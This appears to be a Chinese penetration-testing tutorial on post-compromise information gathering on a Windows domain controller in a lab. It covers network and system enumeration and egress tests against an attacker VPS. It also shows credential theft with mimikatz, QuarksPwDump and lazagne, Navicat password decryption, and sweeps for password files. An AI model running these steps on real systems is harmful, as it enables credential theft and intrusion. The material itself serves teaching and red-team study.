如何使用單機(jī)信息收集

這篇文章主要介紹“如何使用單機(jī)信息收集”，在日常操作中，相信很多人在如何使用單機(jī)信息收集問題上存在疑惑，小編查閱了各式資料，整理出簡單好用的操作方法，希望對大家解答”如何使用單機(jī)信息收集”的疑惑有所幫助！接下來，請跟著小編一起來學(xué)習(xí)吧！

思考

當(dāng)我們獲得一個(gè)webshell、或者通過釣魚等等獲得初始訪問權(quán)后，在進(jìn)一步滲透之前，我們有必要先收集一下當(dāng)前機(jī)的信息，不單單是當(dāng)前機(jī)的配置信息。

下面主要思考以下幾個(gè)問題：

收集那些信息？

怎么收集這些信息？

為什么收集這些信息（有啥用，在哪用）？

解題

收集信息列表

本機(jī)配置信息-網(wǎng)絡(luò)配置、是否域、系統(tǒng)配置、出網(wǎng)、端口連接信息、服務(wù)、進(jìn)程、已安裝軟件、host文件、環(huán)境變量

賬號密碼 -本機(jī)賬號密碼、域內(nèi)其他賬號、數(shù)據(jù)庫密碼、SSH密碼、遠(yuǎn)程登陸密碼、WIFI密碼、服務(wù)配置文件密碼、備份文件密碼等等

其他信息- 瀏覽器歷史+書簽、常用位置等等

收集方法及作用

本機(jī)配置信息

1. 網(wǎng)絡(luò)配置

[ ip、網(wǎng)關(guān)、掩碼、dns后綴] ：主要用來配置一些網(wǎng)絡(luò)信息，方便通道構(gòu)建、了解當(dāng)前網(wǎng)段大小

ipconfig /all

PS C:\Users\Administrator> ipconfig /all

Windows IP 配置

   主機(jī)名  . . . . . . . . . . . . . : WIN-DC
   主 DNS 后綴 . . . . . . . . . . . : langke.org
   節(jié)點(diǎn)類型  . . . . . . . . . . . . : 混合
   IP 路由已啟用 . . . . . . . . . . : 否
   WINS 代理已啟用 . . . . . . . . . : 否
   DNS 后綴搜索列表  . . . . . . . . : langke.org

以太網(wǎng)適配器 Ethernet0:

   連接特定的 DNS 后綴 . . . . . . . :
   描述. . . . . . . . . . . . . . . : Intel(R) 82574L 千兆網(wǎng)絡(luò)連接
   物理地址. . . . . . . . . . . . . : 00-0C-29-95-22-43
   DHCP 已啟用 . . . . . . . . . . . : 否
   自動(dòng)配置已啟用. . . . . . . . . . : 是
   本地鏈接 IPv6 地址. . . . . . . . : fe80::ed4c:c67:a2b6:7a38%12(首選)
   IPv4 地址 . . . . . . . . . . . . : 192.168.4.3(首選)
   子網(wǎng)掩碼  . . . . . . . . . . . . : 255.255.255.0
   默認(rèn)網(wǎng)關(guān). . . . . . . . . . . . . :
   DHCPv6 IAID . . . . . . . . . . . : 301993001
   DHCPv6 客戶端 DUID  . . . . . . . : 00-01-00-01-27-5B-EF-6E-00-0C-29-95-22-43
   DNS 服務(wù)器  . . . . . . . . . . . : ::1
   TCPIP 上的 NetBIOS  . . . . . . . : 已啟用

隧道適配器 isatap.{9A2D7433-2455-4F1A-9314-BBC3C6939A99}:

   媒體狀態(tài)  . . . . . . . . . . . . : 媒體已斷開
   連接特定的 DNS 后綴 . . . . . . . :
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已啟用 . . . . . . . . . . . : 否
   自動(dòng)配置已啟用. . . . . . . . . . : 是

[DNS緩存]

ipconfig /displaydns

PS C:\Users\Administrator> ipconfig /displaydns

Windows IP 配置

    _ldap._tcp.win-dc.langke.org
    ----------------------------------------
    名稱不存在。


    542906ca-9ac1-4fa5-b9d4-d1c60954df6c._msdcs.langke.org
    ----------------------------------------
    記錄名稱. . . . . . . : 542906ca-9ac1-4fa5-b9d4-d1c60954df6c._msdcs.langke.org
    記錄類型. . . . . . . : 5
    生存時(shí)間. . . . . . . : 144
    數(shù)據(jù)長度. . . . . . . : 8
    部分. . . . . . . . . : 答案
    CNAME 記錄  . . . . . : win-dc.langke.org


    isatap
    ----------------------------------------
    名稱不存在。


    wpad
    ----------------------------------------
    名稱不存在。


    _ldap._tcp.default-first-site-name._sites.win-dc.langke.org
    ----------------------------------------
    名稱不存在。

[路由表]

route print

PS C:\Users\Administrator> route print
===========================================================================
接口列表
 12...00 0c 29 95 22 43 ......Intel(R) 82574L 千兆網(wǎng)絡(luò)連接
  1...........................Software Loopback Interface 1
 13...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2
===========================================================================

IPv4 路由表
===========================================================================
活動(dòng)路由:
網(wǎng)絡(luò)目標(biāo)        網(wǎng)絡(luò)掩碼          網(wǎng)關(guān)       接口   躍點(diǎn)數(shù)
        127.0.0.0        255.0.0.0            在鏈路上         127.0.0.1    306
        127.0.0.1  255.255.255.255            在鏈路上         127.0.0.1    306
  127.255.255.255  255.255.255.255            在鏈路上         127.0.0.1    306
      192.168.4.0    255.255.255.0            在鏈路上       192.168.4.3    266
      192.168.4.3  255.255.255.255            在鏈路上       192.168.4.3    266
    192.168.4.255  255.255.255.255            在鏈路上       192.168.4.3    266
        224.0.0.0        240.0.0.0            在鏈路上         127.0.0.1    306
        224.0.0.0        240.0.0.0            在鏈路上       192.168.4.3    266
  255.255.255.255  255.255.255.255            在鏈路上         127.0.0.1    306
  255.255.255.255  255.255.255.255            在鏈路上       192.168.4.3    266
===========================================================================
永久路由:
  無

IPv6 路由表
===========================================================================
活動(dòng)路由:
 接口躍點(diǎn)數(shù)網(wǎng)絡(luò)目標(biāo)                網(wǎng)關(guān)
  1    306 ::1/128                  在鏈路上
 12    266 fe80::/64                在鏈路上
 12    266 fe80::ed4c:c67:a2b6:7a38/128
                                    在鏈路上
  1    306 ff00::/8                 在鏈路上
 12    266 ff00::/8                 在鏈路上
===========================================================================
永久路由:
  無

[arp表] ：獲取arp緩存記錄，發(fā)現(xiàn)內(nèi)網(wǎng)中更多的存活主機(jī)。

arp -a

PS C:\Users\Administrator> arp -a

接口: 192.168.4.3 --- 0xc
  Internet 地址         物理地址              類型
  192.168.4.100         00-0c-29-11-83-25     動(dòng)態(tài)
  192.168.4.101         00-0c-29-dd-e4-ef     動(dòng)態(tài)
  192.168.4.255         ff-ff-ff-ff-ff-ff     靜態(tài)
  224.0.0.22            01-00-5e-00-00-16     靜態(tài)
  224.0.0.252           01-00-5e-00-00-fc     靜態(tài)

2. 是否域

[主機(jī)名、域信息]：看當(dāng)前主機(jī)是否在域內(nèi)，如果在域內(nèi)，進(jìn)一步收集當(dāng)前域信息。

net config workstation

PS C:\Users\Administrator> net config workstation
計(jì)算機(jī)名                     \\WIN-DC
計(jì)算機(jī)全名                   WIN-DC.langke.org
用戶名                       Administrator

工作站正運(yùn)行于
        NetBT_Tcpip_{9A2D7433-2455-4F1A-9314-BBC3C6939A99} (000C29952243)

軟件版本                     Windows Server 2012 R2 Standard

工作站域                     LANGKE
工作站域 DNS 名稱            langke.org
登錄域                       LANGKE

COM 打開超時(shí) (秒)            0
COM 發(fā)送計(jì)數(shù) (字節(jié))          16
COM 發(fā)送超時(shí) (毫秒)          250
命令成功完成。

3. 系統(tǒng)配置

[系統(tǒng)名稱、版本、位數(shù)、啟動(dòng)時(shí)間、是否虛擬機(jī)及虛擬機(jī)類型]：了解系統(tǒng)的基本信息，主要是方便工具的選擇，還有不同版本W(wǎng)indows的變更。比如：2012版后默認(rèn)無法讀取明文密碼，只能讀取密碼hash或更改注冊表并重啟才能讀取密碼。

systeminfo

PS C:\Users\Administrator> systeminfo

主機(jī)名:           WIN-DC
OS 名稱:          Microsoft Windows Server 2012 R2 Standard
OS 版本:          6.3.9600 暫缺 Build 9600
OS 制造商:        Microsoft Corporation
OS 配置:          主域控制器
OS 構(gòu)件類型:      Multiprocessor Free
注冊的所有人:     Windows 用戶
注冊的組織:
產(chǎn)品 ID:          00252-70000-00000-AA581
初始安裝日期:     2019/10/21, 23:12:01
系統(tǒng)啟動(dòng)時(shí)間:     2020/12/4, 23:36:58
系統(tǒng)制造商:       VMware, Inc.
系統(tǒng)型號:         VMware Virtual Platform
系統(tǒng)類型:         x64-based PC
處理器:           安裝了 2 個(gè)處理器。
                  [01]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~
                  [02]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~
BIOS 版本:        Phoenix Technologies LTD 6.00, 2018/4/13
Windows 目錄:     C:\Windows
系統(tǒng)目錄:         C:\Windows\system32
啟動(dòng)設(shè)備:         \Device\HarddiskVolume1
系統(tǒng)區(qū)域設(shè)置:     zh-cn;中文(中國)
輸入法區(qū)域設(shè)置:   zh-cn;中文(中國)
時(shí)區(qū):             (UTC+08:00)北京，重慶，香港特別行政區(qū)，烏魯木齊
物理內(nèi)存總量:     2,047 MB
可用的物理內(nèi)存:   846 MB
虛擬內(nèi)存: 最大值: 6,655 MB
虛擬內(nèi)存: 可用:   5,255 MB
虛擬內(nèi)存: 使用中: 1,400 MB
頁面文件位置:     C:\pagefile.sys
域:               langke.org
登錄服務(wù)器:       \\WIN-DC
修補(bǔ)程序:         安裝了 110 個(gè)修補(bǔ)程序。
                  [01]: KB2894852
                  [02]: KB2894856
                  [03]: KB2919355
                        ·
                        ·
                        ·
網(wǎng)卡:             安裝了 1 個(gè) NIC。
                  [01]: Intel(R) 82574L 千兆網(wǎng)絡(luò)連接
                      連接名:      Ethernet0
                      啟用 DHCP:   否
                      IP 地址
                        [01]: 192.168.4.3
                        [02]: fe80::ed4c:c67:a2b6:7a38
Hyper-V 要求:     已檢測到虛擬機(jī)監(jiān)控程序。將不顯示 Hyper-V 所需的功能。

4. 是否出網(wǎng)

[TCP、ICMP、UDP、DNS]：了解主機(jī)是否可以連接外網(wǎng)、主要為了配合代理搭建、數(shù)據(jù)導(dǎo)出等等

telnet vps_ip 80

ping vps_ip

nc -u vps_ip 53

nslookup www.baidu.com

5. 端口連接信息

[開放端口、連接信息]：主要用來收集端口開放情況，方便進(jìn)一步滲透，比如： 3389端口，可以直接去連接桌面，1433端口，可以去進(jìn)一步收集信息。

netstat -ano

C:\Users\lisi>netstat -ano

活動(dòng)連接

  協(xié)議  本地地址          外部地址        狀態(tài)           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       728
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:554            0.0.0.0:0              LISTENING       2992
  TCP    0.0.0.0:2869           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:10243          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       400
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       780
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       948
  TCP    0.0.0.0:49159          0.0.0.0:0              LISTENING       504
  TCP    0.0.0.0:64849          0.0.0.0:0              LISTENING       512
  TCP    192.168.4.101:139      0.0.0.0:0              LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       728
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:554               [::]:0                 LISTENING       2992
  TCP    [::]:2869              [::]:0                 LISTENING       4
  TCP    [::]:5357              [::]:0                 LISTENING       4
  TCP    [::]:10243             [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       400
  TCP    [::]:49153             [::]:0                 LISTENING       780
  TCP    [::]:49154             [::]:0                 LISTENING       948
  TCP    [::]:49159             [::]:0                 LISTENING       504
  TCP    [::]:64849             [::]:0                 LISTENING       512
  UDP    0.0.0.0:123            *:*                                    596
  UDP    0.0.0.0:3702           *:*                                    1456
  UDP    0.0.0.0:3702           *:*                                    1456
  UDP    0.0.0.0:5004           *:*                                    2992
  UDP    0.0.0.0:5005           *:*                                    2992
  UDP    0.0.0.0:5355           *:*                                    1052
  UDP    0.0.0.0:55527          *:*                                    1456
  UDP    127.0.0.1:1900         *:*                                    1456
  UDP    127.0.0.1:55529        *:*                                    512
  UDP    127.0.0.1:55531        *:*                                    1052
  UDP    127.0.0.1:58374        *:*                                    948
  UDP    127.0.0.1:60697        *:*                                    1456
  UDP    192.168.4.101:137      *:*                                    4
  UDP    192.168.4.101:138      *:*                                    4
  UDP    192.168.4.101:1900     *:*                                    1456
  UDP    192.168.4.101:60696    *:*                                    1456
  UDP    [::]:123               *:*                                    596
  UDP    [::]:3702              *:*                                    1456
  UDP    [::]:3702              *:*                                    1456
  UDP    [::]:5004              *:*                                    2992
  UDP    [::]:5005              *:*                                    2992
  UDP    [::]:5355              *:*                                    1052
  UDP    [::]:55528             *:*                                    1456
  UDP    [::1]:1900             *:*                                    1456
  UDP    [::1]:60695            *:*                                    1456
  UDP    [fe80::d4b6:7c0:d036:7e77%11]:1900  *:*
    1456
  UDP    [fe80::d4b6:7c0:d036:7e77%11]:60694  *:*
     1456

6. 補(bǔ)丁

[補(bǔ)丁網(wǎng)址、ID、日期]：收集系統(tǒng)安裝的補(bǔ)丁信息，一般提權(quán)時(shí)查找對應(yīng)exp

wmic qfe get Caption,Description,HotFixID,InstalledOn

C:\Users\Administrator>wmic qfe get Caption,Description,HotFixID,InstalledOn
Caption                                     Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=2534111  Hotfix           KB2534111  1/27/2020
http://support.microsoft.com/?kbid=2621440  Security Update  KB2621440  12/4/2020
http://support.microsoft.com/?kbid=2653956  Security Update  KB2653956  12/4/2020
http://support.microsoft.com/?kbid=2943357  Security Update  KB2943357  6/24/2020
http://support.microsoft.com/?kbid=2999226  Update           KB2999226  1/27/2020
http://support.microsoft.com/?kbid=3097989  Security Update  KB3097989  6/24/2020
http://support.microsoft.com/?kbid=4019990  Update           KB4019990  12/4/2020
http://support.microsoft.com/?kbid=4040980  Update           KB4040980  12/4/2020
http://support.microsoft.com                Update           KB958488   2/9/2020
http://support.microsoft.com/?kbid=976902   Update           KB976902   11/21/2010

7. 服務(wù)

[服務(wù)名、模式、路徑名]：收集當(dāng)前系統(tǒng)正在運(yùn)行的服務(wù)，主要看看有沒有殺軟、監(jiān)控軟件、web服務(wù)、數(shù)據(jù)庫服務(wù)。

wmic service where (state="running") get caption, name, startmode,pathname

C:\Users\Administrator>wmic service where (state="running") get caption, name, startmode,pathname
Caption                                    Name                                 PathName
                                           StartMode
Active Directory Web Services              ADWS                                 C:\Windows\ADWS\Microsoft.ActiveDirector
y.WebServices.exe                          Auto
Base Filtering Engine                      BFE                                  C:\Windows\system32\svchost.exe -k Local
ServiceNoNetwork                           Auto
Background Intelligent Transfer Service    BITS                                 C:\Windows\System32\svchost.exe -k netsv
cs                                         Auto
Background Tasks Infrastructure Service    BrokerInfrastructure                 C:\Windows\system32\svchost.exe -k DcomL
aunch                                      Auto
Computer Browser                           Browser                              C:\Windows\System32\svchost.exe -k netsv
cs                                         Auto
COM+ System Application                    COMSysApp                            C:\Windows\system32\dllhost.exe /Process
id:{02D4B3F1-FD88-11D1-960D-00805FC79235}  Manual
Cryptographic Services                     CryptSvc                             C:\Windows\system32\svchost.exe -k Netwo
rkService                                  Auto
DCOM Server Process Launcher               DcomLaunch                           C:\Windows\system32\svchost.exe -k DcomL
aunch                                      Auto
DFS Namespace                              Dfs                                  C:\Windows\system32\dfssvc.exe
                                           Auto
DFS Replication                            DFSR                                 C:\Windows\system32\DFSRs.exe
                                           Auto
DHCP Client                                Dhcp                                 C:\Windows\system32\svchost.exe -k Local
ServiceNetworkRestricted                   Auto
DHCP Server                                DHCPServer                           C:\Windows\system32\svchost.exe -k DHCPS
erver                                      Auto
Diagnostics Tracking Service               DiagTrack                            C:\Windows\System32\svchost.exe -k utcsv 

······

8. 進(jìn)程

[進(jìn)程名、pid、對應(yīng)服務(wù)]：收集系統(tǒng)當(dāng)前運(yùn)行的進(jìn)程，關(guān)注是否有殺軟、監(jiān)控軟件、遠(yuǎn)程管理工具等

tasklist /svc

C:\Users\Administrator>tasklist /svc

映像名稱                       PID 服務(wù)
========================= ======== ============================================
lsass.exe                      504 Kdc, Netlogon, NTDS, SamSs
svchost.exe                    636 BrokerInfrastructure, DcomLaunch, LSM,
                                   PlugPlay, Power, SystemEventsBroker
svchost.exe                    680 RpcEptMapper, RpcSs
dwm.exe                        776 暫缺
vmacthlp.exe                   796 VMware Physical Disk Helper Service
svchost.exe                    860 Dhcp, EventLog, lmhosts, Wcmsvc
svchost.exe                    892 BITS, Browser, DsmSvc, gpsvc, IKEEXT,
                                   iphlpsvc, LanmanServer, ProfSvc, Schedule,
                                   SENS, ShellHWDetection, Themes, Winmgmt
svchost.exe                    940 EventSystem, FontCache, netprofm, nsi,
                                   W32Time
svchost.exe                   1012 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc, WinRM
svchost.exe                    736 BFE, DPS, MpsSvc
spoolsv.exe                   1340 Spooler
Microsoft.ActiveDirectory     1372 ADWS
dfsrs.exe                     1412 DFSR
svchost.exe                   1452 DHCPServer
svchost.exe                   1472 DiagTrack
dns.exe                       1488 DNS
ismserv.exe                   1508 IsmServ
MsDtsSrvr.exe                 1724 MsDtsServer110
SMSvcHost.exe                 1880 NetTcpPortSharing
sqlbrowser.exe                1932 SQLBrowser
sqlwriter.exe                 2000 SQLWriter
ServerManager.exe             3536 暫缺
vmtoolsd.exe                  1984 暫缺
mmc.exe                       1872 暫缺
powershell.exe                1428 暫缺
conhost.exe                   1776 暫缺
cmd.exe                       1076 暫缺
tasklist.exe                  3948 暫缺

9. 已安裝軟件

[軟件、版本]：此命令收集的已安裝軟件可能不全，不過可以大概了解已安裝的軟件信息?？梢杂脕硖釞?quán)和留后門。比如之前的某狗輸入法依賴等。

wmic product get name,version

C:\Users\Administrator>wmic product get name,version
Name                                                                               Version
Microsoft Application Error Reporting                                              12.0.6012.5000
Microsoft SQL Server System CLR Types                                              10.51.2500.0
SQL Server 2012 Client Tools                                                       11.0.2100.60
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4974                     9.0.30729.4974
SQL Server 2012 Documentation Components                                           11.0.2100.60
Microsoft SQL Server 2012 數(shù)據(jù)層應(yīng)用程序框架                                       11.0.2100.60
SQL Server 2012 Master Data Services                                               11.0.2100.60
Microsoft SQL Server 2012 Native Client                                            11.0.2100.60
SQL Server 2012 Database Engine Services                                           11.0.2100.60
Microsoft System CLR Types for SQL Server 2012                                     11.0.2100.60
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219                        10.0.40219
SQL Server 2012 Distributed Replay                                                 11.0.2100.60
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.12.25810                     14.12.25810
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219                        10.0.40219
Microsoft SQL Server 2012 管理對象                                                 11.0.2100.60
VMware Tools                                                                       10.3.2.9925305
SQL Server 2012 Integration Services                                               11.0.2100.60
Microsoft VSS Writer for SQL Server 2012                                           11.0.2100.60
Visual Studio 2010 Prerequisites - English                                         10.0.40219
SQL Server 2012 Distributed Replay                                                 11.0.2100.60

10. hosts

[host文件]：系統(tǒng)的host配置，可能會(huì)收集到一些隱藏資產(chǎn)

C:\Windows\System32\drivers\etc\hosts

C:\Users\Administrator>type C:\Windows\System32\drivers\etc\hosts
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost

11. 環(huán)境變量

[環(huán)境變量]：收集系統(tǒng)的環(huán)境變量，主要看有哪些可使用的腳本、程序等

path

C:\Users\Administrator>path
PATH=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program File
s\Microsoft SQL Server\110\DTS\Binn\;C:\Program Files (x86)\Microsoft SQL Server\110\Tools\Binn\ManagementStudio\;C:\Pro
gram Files (x86)\Microsoft SQL Server\110\Tools\Binn\;C:\Program Files\Microsoft SQL Server\110\Tools\Binn\;C:\Program F
iles (x86)\Microsoft Visual Studio 10.0\Common7\IDE\PrivateAssemblies\;C:\Program Files (x86)\Microsoft SQL Server\110\D
TS\Binn\

12. 防火墻配置規(guī)則

[防火墻規(guī)則]：收集系統(tǒng)的防火墻配置規(guī)則，查看出入網(wǎng)配置情況。

netsh firewall show config

C:\Users\Administrator>netsh firewall show config

域 配置文件配置:
-------------------------------------------------------------------
操作模式                          = 禁用
例外模式                          = 啟用
多播/廣播響應(yīng)模式                 = 啟用
通知模式                          = 禁用

域 配置文件的服務(wù)配置文件:
模式     自定義      名稱
-------------------------------------------------------------------
啟用       否           文件和打印機(jī)共享

域 配置文件的允許的程序配置:
模式     流量方向             名稱/程序
-------------------------------------------------------------------

域 配置文件的端口配置:
端口   協(xié)議    流量方向              名稱
-------------------------------------------------------------------
1688   TCP       啟用      入站                    HEU_KMS_Service

······ ?

賬號密碼

1. 本機(jī)賬號密碼

本機(jī)用戶

net user

C:\Users\Administrator>net user

\\WIN-DC 的用戶帳戶

-------------------------------------------------------------------------------
Administrator            Guest                    john
krbtgt                   lisi
命令成功完成。

在線用戶

query user

C:\Users\Administrator>query user
 用戶名                會(huì)話名             ID  狀態(tài)    空閑時(shí)間   登錄時(shí)間
>administrator         console             1  運(yùn)行中      無     2020/12/4 23:38

密碼

mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit

c:\Users\lisi\Desktop>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit

  .#####.   mimikatz 2.2.0 (x64) #17763 Mar 25 2019 01:42:05
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # log
Using 'mimikatz.log' for logfile : OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 1931626 (00000000:001d796a)
Session           : Interactive from 2
User Name         : administrator
Domain            : LANGKE
Logon Server      : WIN-DC
Logon Time        : 2020/12/5 0:20:14
SID               : S-1-5-21-2022301354-2747916058-908538118-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : LANGKE
         * LM       : 629ea9eacefe7125c187b8085fe1d9df
         * NTLM     : 2723e394bfa34a878b638852b4e37335
         * SHA1     : 87af129263c193d09d6cade355c50a2d415cabe7
        tspkg :
         * Username : Administrator
         * Domain   : LANGKE
         * Password : 2wsx@WSX
        wdigest :
         * Username : Administrator
         * Domain   : LANGKE
         * Password : 2wsx@WSX
        kerberos :
         * Username : administrator
         * Domain   : LANGKE.ORG
         * Password : 2wsx@WSX
        ssp :
        credman :

Authentication Id : 0 ; 630324 (00000000:00099e34)
Session           : Interactive from 2
User Name         : lisi
Domain            : LANGKE
Logon Server      : WIN-DC
Logon Time        : 2020/12/4 23:45:44
SID               : S-1-5-21-2022301354-2747916058-908538118-1116

hash

QuarksPwDump.exe

// 本機(jī)hash
C:\Users\Administrator\Desktop>QuarksPwDump.exe -dhl
[+] Setting BACKUP and RESTORE privileges...[OK]
[+] Parsing SAM registry hive...[OK]
[+] BOOTKEY retrieving...[OK]
BOOTKEY = D61E03DA80125215915636F578505991

--------------------------------------------- BEGIN DUMP --------------------------------------------
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:BC007082D32777855E253FD4DEFE70EE:::
---------------------------------------------- END DUMP ---------------------------------------------

2 dumped accounts

// 域hash
C:\Users\Administrator\Desktop>QuarksPwDump.exe -dhdc
[+] SYSKEY restrieving...[OK]
SYSKEY = 20242EE7E4AABBF78F48427B90233C50
[+] Setting BACKUP and RESTORE privileges...[OK]
[+] Parsing SECURITY registry hive...[OK]
[+] LSAKEY(s) retrieving...[OK]
LSAKEY = 708EBC555B43CA7C87FFEB7A46B41797C93D48746571F72838CA61E4D9F72CC1
[+] NLKM retrieving...[OK]
NL$KM = 5AA3BF230BD33D6CAE9F8ED398C50E336DD59357DCEBD64316ADD33B6183BF5F20CB880B7E664D68319673D10315EFF643934B4440D
F911AF41239E7DA82A313

No cached domain password found!

2. 域內(nèi)其他賬號

域用戶

net user /domain

C:\Users\Administrator\Desktop>net user /domain

\\WIN-DC 的用戶帳戶

-------------------------------------------------------------------------------
Administrator            Guest                    john
krbtgt                   lisi
命令成功完成。

當(dāng)前域在線機(jī)器

net view

C:\Users\Administrator\Desktop>net view
服務(wù)器名稱            注解

-------------------------------------------------------------------------------
\\WIN-DC
\\WIN-OA41MD9F1FJ
命令成功完成。

當(dāng)前域中的域管

net group "domain admins" /domain

C:\Users\Administrator\Desktop>net group "domain admins" /domain
組名     Domain Admins
注釋     指定的域管理員

成員

-------------------------------------------------------------------------------
Administrator
命令成功完成。

3. 數(shù)據(jù)庫中的密碼

[Mysql]

select name,password from mysql.user

[MSSQL]

SELECT name, password_hash FROM master.sys.sql_logins;

4. 瀏覽器保存密碼、遠(yuǎn)程登陸密碼、Windows系統(tǒng)保存的憑證、WIFI密碼等

lazagne.exe

5. FileZilla中保存的信息

[主機(jī)、端口、賬號、密碼]

type %appdata%\FileZilla\filezilla.xml | findstr /C:"Host" /c:"Pass" /c:"Port" /c:"User"

C:\Users\Administrator>type %appdata%\FileZilla\filezilla.xml | findstr /C:"Host" /c:"Pass" /c:"Port" /c:"User"
                <Setting name="Config Location" platform="win">C:\Users\john\App
Data\Roaming\FileZilla\</Setting>
                                        <Host />
                                        <Port>21</Port>
                                        <LocalPath>C:\Users\john\</LocalPath>
                                        <Host>127.0.0.1</Host>
                                        <Port>21</Port>
                                        <User>admin</User>
                                        <Pass encoding="base64">MTIzNDU2Nzg=</Pass>

6. 管理工具中保存的信息

Navicat

[Mysql、MSSQL、Oracle、SQLite、MariaDB、PostgreSQL]：主機(jī)、端口、賬號都是明文，密碼為自定義加密，網(wǎng)上有解密腳本。

MySQL：HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\

MariaDB：HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers\

Microsoft SQL：HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers\

Oracle：HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers\

PostgreSQL：HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers\

SQLite：HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers\

// 查看保存有那些數(shù)據(jù)庫的賬號密碼
C:\Users\Administrator>reg query HKCU\Software\PremiumSoft /f Navicat

HKEY_CURRENT_USER\Software\PremiumSoft\Navicat
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMONGODB
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPremium
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite
搜索結(jié)束: 找到 8 匹配。

// 查看用戶名
C:\Users\Administrator>reg query HKCU\Software\PremiumSoft /s /f UserName /e

HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.122
    UserName    REG_SZ    root

HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.123
    UserName    REG_SZ    root

// 查看密碼hash
reg query HKCU\Software\PremiumSoft /s /f Pwd /e
C:\Users\Administrator>reg query HKCU\Software\PremiumSoft /s /f Pwd /e

HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.122
    Pwd    REG_SZ

HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.123
    Pwd    REG_SZ    5658213BB7E6B3

https://github.com/HyperSine/how-does-navicat-encrypt-password

C:\Users\Administrator>navicat-encrypt-password\python3>python3 NavicatCryptoHelper.py -d 5658213BB7E6B3
root!@#

TeamViewer、Xshell、VNC、Winscp、FoXMail等等

5. 文件中保存的賬號密碼

[文件名]：

dir /s /b "*密碼*" "*登錄*" "*資產(chǎn)*" "*VPN*" "*Svn*" "*Git*" "*交接*" "*離職*" "*網(wǎng)絡(luò)*" "*后臺(tái)*" "*拓?fù)?" "*郵箱*" "*工資*" "*管理員*" "*巡檢*" "*備份*"

[文件內(nèi)容]：從后綴為*.conf *.asp *.php *.jsp *.aspx *.cgi *.xml *.ini *.inf *.txt *.cgi的文件中搜索包含"user=" "pass=" "login=" "uid=" "pwd="等關(guān)鍵字的行

findstr /I /c:"user=" /c:"pass=" /c:"login=" /c:"uid=" /c:"pwd=" /si *.conf *.asp *.php *.jsp *.aspx *.cgi *.xml *.ini *.inf *.txt *.cgi

其他信息

1. 瀏覽器歷史+書簽

[Chrome 書簽]：json格式

C:\Users\當(dāng)前用戶名\AppData\Local\Google\Chrome\User Data\Guest Profile\Bookmarks

[Chrome 歷史記錄]：SQLite格式，無密碼。

C:\Users\當(dāng)前用戶名\AppData\Local\Google\Chrome\User Data\Default\History

Firefox、IE、Safar等等

工具：http://www.nirsoft.net

2. 常用位置文件列表

[桌面、下載]：大概率會(huì)有驚喜

dir c:%HOMEPATH%\Desktop

dir c:%HOMEPATH%\Download

